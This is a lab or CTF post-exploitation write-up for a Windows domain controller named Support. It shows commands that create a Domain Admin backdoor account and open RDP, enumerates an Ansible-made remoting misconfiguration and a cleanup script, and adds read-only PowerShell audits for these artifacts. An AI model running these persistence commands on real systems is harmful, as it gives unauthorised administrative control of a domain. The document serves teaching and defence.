Beyond
This is the beyond page: additional post-exploitation enumeration and assessment conducted as the SYSTEM user after [[Support_Privilege_Escalation|compromising]] the target system with the [RBCD (Resource-based Constrained Delegation) attack](https://www.thehacker.recipes/a-d/movement/kerberos/delegations/rbcd).
c:\Windows\system32> net user adm1n Qwer1234 /ADD /DOMAIN
The command completed successfully.
c:\Windows\system32> net group "Domain Admins" /ADD adm1n
The command completed successfully.
Creating a DA user
c:\Windows\system32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
c:\Windows\system32> netsh firewall add portopening TCP 3389 "Remote Desktop"
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
Ok.
Starting RDP server and opening up the corresponding port
The target appears to be Windows Server Core, with no GUI.
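From the defender's side, the three persistence steps above (a new domain user added to Domain Admins, RDP enabled in the registry, TCP 3389 opened in the firewall) each leave an artifact that can be checked. The following is an added example, not part of the original writeup; it assumes it runs elevated on the domain controller with read access to the Security log and with the ActiveDirectory and NetSecurity modules available. The event IDs, registry key and port are standard Windows values; the function names are mine.

```powershell
# Added example (not from the original writeup): audit for the persistence
# steps shown above. Assumes an elevated session on the DC with the
# ActiveDirectory and NetSecurity modules and read access to the Security log.

function Get-RecentAccountAndGroupChanges {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)
    # 4720 = user account created; 4728 = member added to a security-enabled
    # global group (Domain Admins is a global group)
    $filter = @{ LogName = 'Security'; Id = 4720, 4728; StartTime = $since }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        # Flatten the EventData fields of the event XML into a name/value table
        $data = @{}
        foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        if ($e.Id -eq 4720) {
            $change = 'created user {0}' -f $data['TargetUserName']
        } else {
            $change = 'added {0} to {1}' -f $data['MemberName'], $data['TargetUserName']
        }
        [pscustomobject]@{
            Time    = $e.TimeCreated
            EventId = $e.Id
            Subject = '{0}\{1}' -f $data['SubjectDomainName'], $data['SubjectUserName']
            Change  = $change
        }
    }
}

function Test-RdpExposure {
    $key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $deny = (Get-ItemProperty -Path $key -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections
    # Any enabled inbound rule whose port filter includes 3389, whatever it is named;
    # the legacy "netsh firewall add portopening" rule shows up here too
    $rules = Get-NetFirewallRule -Enabled True -Direction Inbound -ErrorAction SilentlyContinue |
        Where-Object { ($_ | Get-NetFirewallPortFilter).LocalPort -contains '3389' }
    [pscustomobject]@{
        RdpEnabledInRegistry = ($deny -eq 0)
        InboundRulesFor3389  = @($rules | ForEach-Object DisplayName)
    }
}

function Get-DomainAdminMembers {
    # Snapshot of effective Domain Admins membership, for comparison with a known-good list
    Get-ADGroupMember -Identity 'Domain Admins' -Recursive | Select-Object SamAccountName, objectClass
}

Get-RecentAccountAndGroupChanges | Format-Table -AutoSize
Test-RdpExposure | Format-List
Get-DomainAdminMembers | Format-Table -AutoSize
```

On the target as left by the steps above, the first function would show a 4720 for adm1n followed by a 4728 adding it to Domain Admins, both with a SYSTEM subject, and the second would report the registry value cleared and an inbound rule for 3389.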
Management
The MANAGEMENT$ host is still unreachable.
PS C:\Users\adm1n> ping -n 2 10.10.10.2
Pinging 10.10.10.2 with 32 bytes of data:
Reply from 10.10.10.2: bytes=32 time<1ms TTL=64
Reply from 10.10.10.2: bytes=32 time<1ms TTL=64
Ping statistics for 10.10.10.2:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
However, the 10.10.10.2 host can still be reached.
Ansible
ps c:\Users\Administrator> cat .\.ansible_async\472362125829.2344
{"output":[{"Type":"Container","PSChildName":"Security_2055936308","TypeNameOfElement":"Container","PSProvider":{"Name":"WSMan","Description":"","Capabilities":32,"HelpFile":"Microsoft.WSMan.Management.dll-Help.xml","PSSnapIn":"Microsoft.WSMan.Management","ImplementingType":"Microsoft.WSMan.Management.WSManConfigProvider","Module":null,"Drives":"WSMan","ModuleName":"Microsoft.WSMan.Management","Home":""},"PSParentPath":"Microsoft.WSMan.Management\\WSMan::localhost\\Plugin\\microsoft.powershell\\Resources\\Resource_1088764045\\Security","PSPath":"Microsoft.WSMan.Management\\WSMan::localhost\\Plugin\\microsoft.powershell\\Resources\\Resource_1088764045\\Security\\Security_2055936308","Name":"Security_2055936308","Keys":["Uri=http://schemas.microsoft.com/powershell/microsoft.powershell"],"PSIsContainer":true},{"Type":"Container","PSChildName":"Security_1214545474","TypeNameOfElement":"Container","PSProvider":{"Name":"WSMan","Description":"","Capabilities":32,"HelpFile":"Microsoft.WSMan.Management.dll-Help.xml","PSSnapIn":"Microsoft.WSMan.Management","ImplementingType":"Microsoft.WSMan.Management.WSManConfigProvider","Module":null,"Drives":"WSMan","ModuleName":"Microsoft.WSMan.Management","Home":""},"PSParentPath":"Microsoft.WSMan.Management\\WSMan::localhost\\Plugin\\microsoft.powershell.workflow\\Resources\\Resource_1140488768\\Security","PSPath":"Microsoft.WSMan.Management\\WSMan::localhost\\Plugin\\microsoft.powershell.workflow\\Resources\\Resource_1140488768\\Security\\Security_1214545474","Name":"Security_1214545474","Keys":["Uri=http://schemas.microsoft.com/powershell/microsoft.powershell.workflow"],"PSIsContainer":true},{"Type":"Container","PSChildName":"Security_591915939","TypeNameOfElement":"Container","PSProvider":{"Name":"WSMan","Description":"","Capabilities":32,"HelpFile":"Microsoft.WSMan.Management.dll-Help.xml","PSSnapIn":"Microsoft.WSMan.Management","ImplementingType":"Microsoft.WSMan.Management.WSManConfigProvider","Module":null,"Drives":"WSMan","ModuleName":"Microsoft.WSMan.Management","Home":""},"PSParentPath":"Microsoft.WSMan.Management\\WSMan::localhost\\Plugin\\microsoft.powershell32\\Resources\\Resource_850232060\\Security","PSPath":"Microsoft.WSMan.Management\\WSMan::localhost\\Plugin\\microsoft.powershell32\\Resources\\Resource_850232060\\Security\\Security_591915939","Name":"Security_591915939","Keys":["Uri=http://schemas.microsoft.com/powershell/microsoft.powershell32"],"PSIsContainer":true},{"Type":"Container","PSChildName":"Security_1251586456","TypeNameOfElement":"Container","PSProvider":{"Name":"WSMan","Description":"","Capabilities":32,"HelpFile":"Microsoft.WSMan.Management.dll-Help.xml","PSSnapIn":"Microsoft.WSMan.Management","ImplementingType":"Microsoft.WSMan.Management.WSManConfigProvider","Module":null,"Drives":"WSMan","ModuleName":"Microsoft.WSMan.Management","Home":""},"PSParentPath":"Microsoft.WSMan.Management\\WSMan::localhost\\Plugin\\microsoft.windows.servermanagerworkflows\\Resources\\Resource_166323501\\Security","PSPath":"Microsoft.WSMan.Management\\WSMan::localhost\\Plugin\\microsoft.windows.servermanagerworkflows\\Resources\\Resource_166323501\\Security\\Security_1251586456","Name":"Security_1251586456","Keys":["Uri=http://schemas.microsoft.com/powershell/microsoft.windows.servermanagerworkflows"],"PSIsContainer":true},"WinRM service is already running on this machine.","WinRM is already set up for remote management on this computer."],"verbose":[],"results_file":"C:\\Users\\Administrator\\.ansible_async\\472362125829.2344","invocation":{"module_args":{"parameters":null,"removes":null,"depth":2,"executable":null,"chdir":null,"script":"Function Set-SessionConfig \n{ \n Param( [string]$user ) \n $account = New-Object Security.Principal.NTAccount $user \n $sid = $account.Translate([Security.Principal.SecurityIdentifier]).Value \n \n $config = Get-PSSessionConfiguration -Name \"Microsoft.PowerShell\" \n $existingSDDL = $Config.SecurityDescriptorSDDL \n \n $isContainer = $false \n $isDS = $false \n \n $SecurityDescriptor = New-Object -TypeName Security.AccessControl.CommonSecurityDescriptor -ArgumentList $isContainer,$isDS, $existingSDDL \n $accessType = \"Allow\" \n $accessMask = 268435456 \n $inheritanceFlags = \"none\" \n $propagationFlags = \"none\" \n \n $SecurityDescriptor.DiscretionaryAcl.AddAccess($accessType,$sid,$accessMask,$inheritanceFlags,$propagationFlags) \n $SecurityDescriptor.GetSddlForm(\"All\") \n} \n \n$user = \"SUPPORT\\Domain Users\" \n$newSDDL = Set-SessionConfig -user $user \n \nGet-PSSessionConfiguration | \nForEach-Object { \n Set-PSSessionConfiguration -name $_.name -SecurityDescriptorSddl $newSDDL -force \n} \n \nwinrm quickconfig -quiet \n","creates":null,"arguments":null,"error_action":"continue"}},"_ansible_suppress_tmpdir_delete":true,"host_out":"","debug":[],"ansible_job_id":"472362125829.2344","finished":1,"result":{},"changed":true,"information":[],"warning":[],"error":[],"host_err":"","started":1,"failed":false,"ansible_async_watchdog_pid":540}
There is an Ansible async result file at c:\Users\Administrator\.ansible_async\472362125829.2344, which suggests the target system was provisioned with Ansible. The recorded script (Set-SessionConfig) takes the SDDL of the Microsoft.PowerShell session configuration, adds an Allow ACE with access mask 268435456 (0x10000000, GENERIC_ALL) for SUPPORT\Domain Users, applies the resulting SDDL to every PSSession configuration with Set-PSSessionConfiguration, and then runs winrm quickconfig. That is the misconfiguration that grants every domain user PowerShell remoting access to this host.
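A check for that misconfiguration can parse each session configuration's SDDL the same way the recorded Set-SessionConfig script does, but report instead of grant. The block below is an added example, not part of the writeup or of the Ansible play it records; it assumes an elevated session on the host being audited (here the DC), and the $broadGroups list of principals that should never hold an Allow ACE on a session configuration is my own assumption.

```powershell
# Added example (not from the writeup or its Ansible play): list which principals
# each PowerShell session configuration grants access to, parsing the SDDL with
# the same CommonSecurityDescriptor type the recorded script uses.
# $broadGroups is an assumed list of principals that should never be allowed here.
$broadGroups = @('Domain Users', 'Authenticated Users', 'Everyone', 'Users')

function Get-PSSessionConfigAccess {
    foreach ($cfg in Get-PSSessionConfiguration) {
        $sddl = $cfg.SecurityDescriptorSddl
        if (-not $sddl) { continue }   # no SDDL set: built-in default (administrators only)
        # Non-container, non-directory-service descriptor, exactly as in the recorded script
        $sd = New-Object System.Security.AccessControl.CommonSecurityDescriptor -ArgumentList $false, $false, $sddl
        foreach ($ace in $sd.DiscretionaryAcl) {
            $sid = $ace.SecurityIdentifier
            try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $name = $sid.Value }   # unresolvable SID: keep the raw value
            [pscustomobject]@{
                Configuration = $cfg.Name
                Principal     = $name
                AceType       = $ace.AceType
                AccessMask    = '0x{0:X8}' -f $ace.AccessMask
                # 268435456 = 0x10000000 = GENERIC_ALL, the mask the recorded script adds
                GenericAll    = (($ace.AccessMask -band 0x10000000) -ne 0)
                Broad         = [bool]($broadGroups | Where-Object { $name -eq $_ -or $name -like "*\$_" })
            }
        }
    }
}

# Findings: Allow ACEs held by broad groups. On the target as provisioned above this
# lists SUPPORT\Domain Users with GenericAll = True on every configuration.
Get-PSSessionConfigAccess |
    Where-Object { $_.AceType -eq 'AccessAllowed' -and $_.Broad } |
    Format-Table -AutoSize
```

Running it without the final Where-Object filter gives the full ACL per configuration, which is what to compare against the SDDL a clean install has (BUILTIN\Administrators and BUILTIN\Remote Management Users only) before deciding what to remove with Set-PSSessionConfiguration -SecurityDescriptorSddl.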
Scheduled Task
PS C:\Users\Administrator> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*" } | ft TaskName,TaskPath,State
TaskName TaskPath State
-------- -------- -----
Cleanup \ Ready
There is a single scheduled task outside the \Microsoft folder, named Cleanup.
PS C:\Users\Administrator> cmd /c schtasks /QUERY /TN \Cleanup /V /FO LIST
Folder: \
HostName: DC
TaskName: \Cleanup
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 7/21/2022 12:57:55 PM
Last Result: 267014
Author: SUPPORT\administrator
Task To Run: powershell.exe -File c:\users\administrator\documents\clean.ps1
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Administrator
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
The task runs powershell.exe -File c:\users\administrator\documents\clean.ps1 as Administrator at system startup.
clean.ps1
ps c:\Users\Administrator> cat .\Documents\clean.ps1
import-module c:\Users\Administrator\Documents\PowerView.ps1
$computers = @{}
$last_msds = ""
$msds_count = 0
while($true) {
    # get current msds-allowedtoactonbehalfofotheridentity
    $DC = Get-DomainComputer DC
    if ($DC.PSObject.Properties.Name -contains "msds-allowedtoactonbehalfofotheridentity") {
        $RawBytes = $DC | select -expand msds-allowedtoactonbehalfofotheridentity
        $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
        $SecurityID = $Descriptor.DiscretionaryAcl | select -expand SecurityIdentifier
        if ($last_msds -eq $SecurityID) {
            $msds_count += 1
        } else {
            $msds_count = 1
            $last_msds = $SecurityID
        }
    } else {
        $last_msds = ""
    }
    echo "msds: $last_msds [$msds_count]"
    if ($msds_count -ge 5) {
        Get-DomainComputer DC | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity'
    }
    # increment count for each active computer other than DC
    $remove = @()
    Get-DomainComputer | Where { $_.name -ne "DC" } | %{
        $computers[$_.name] += 1
        echo "Found $($_.name) [$($computers[$_.name])]"
    }
    # for any with count >= 5, remove
    ForEach ($key in $computers.Keys) {
        if ($computers[$key] -ge 2) {
            echo "Removing $key."
            remove-adcomputer $key -confirm:$false
            $remove += $key
        }
    }
    # cleanup hash table here since it doesn't like cleanup in loop
    ForEach ($key in $remove) {
        $computers.remove($key)
    }
    sleep 300
}
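clean.ps1 polls every 300 seconds, clears msDS-AllowedToActOnBehalfOfOtherIdentity on DC once the same SID has been seen in five consecutive polls, and deletes any computer account other than DC after it has been seen twice. An administrator who wants the same visibility without the destructive part can audit both conditions read-only. The block below is an added example, not part of the writeup or of the target's clean.ps1; it uses the ActiveDirectory module instead of PowerView and assumes RSAT-AD-PowerShell and read access to the domain. The function names are mine; the attribute names are standard Active Directory schema attributes.

```powershell
# Added example (not from the writeup or from clean.ps1): read-only audit of the
# two conditions clean.ps1 reacts to, using the ActiveDirectory module.
# Assumes RSAT-AD-PowerShell and domain read access.
Import-Module ActiveDirectory

function Get-RbcdDelegations {
    # PrincipalsAllowedToDelegateToAccount is the AD module's decoded view of
    # msDS-AllowedToActOnBehalfOfOtherIdentity, the attribute clean.ps1 parses by hand
    Get-ADComputer -Filter * -Properties PrincipalsAllowedToDelegateToAccount |
        Where-Object { $_.PrincipalsAllowedToDelegateToAccount } |
        ForEach-Object {
            [pscustomobject]@{
                Computer       = $_.Name
                AllowedToActOn = ($_.PrincipalsAllowedToDelegateToAccount -join '; ')
            }
        }
}

function Get-MachineAccountQuota {
    # How many computer accounts an ordinary domain user may add (default 10)
    $domain = Get-ADDomain
    (Get-ADObject -Identity $domain.DistinguishedName -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
}

function Get-NonAdminCreatedComputers {
    # mS-DS-CreatorSID is only populated when the computer object was created by a
    # principal using the machine-account quota rather than by an administrator
    Get-ADComputer -LDAPFilter '(mS-DS-CreatorSID=*)' -Properties mS-DS-CreatorSID, whenCreated |
        ForEach-Object {
            $creator = $_.'mS-DS-CreatorSID'
            if ($creator -is [byte[]]) {
                $creator = New-Object System.Security.Principal.SecurityIdentifier -ArgumentList $creator, 0
            }
            try   { $who = $creator.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $who = $creator.Value }   # creator no longer exists: keep the SID
            [pscustomobject]@{
                Computer  = $_.Name
                Created   = $_.whenCreated
                CreatedBy = $who
            }
        }
}

'ms-DS-MachineAccountQuota: {0}' -f (Get-MachineAccountQuota)
Get-RbcdDelegations | Format-Table -AutoSize
Get-NonAdminCreatedComputers | Sort-Object Created -Descending | Format-Table -AutoSize
```

Against this domain, Get-RbcdDelegations returns the DC with whatever account was written into its attribute, and Get-NonAdminCreatedComputers lists the machine account that was added through the quota, together with the user that created it, which is the entry clean.ps1 would otherwise silently delete.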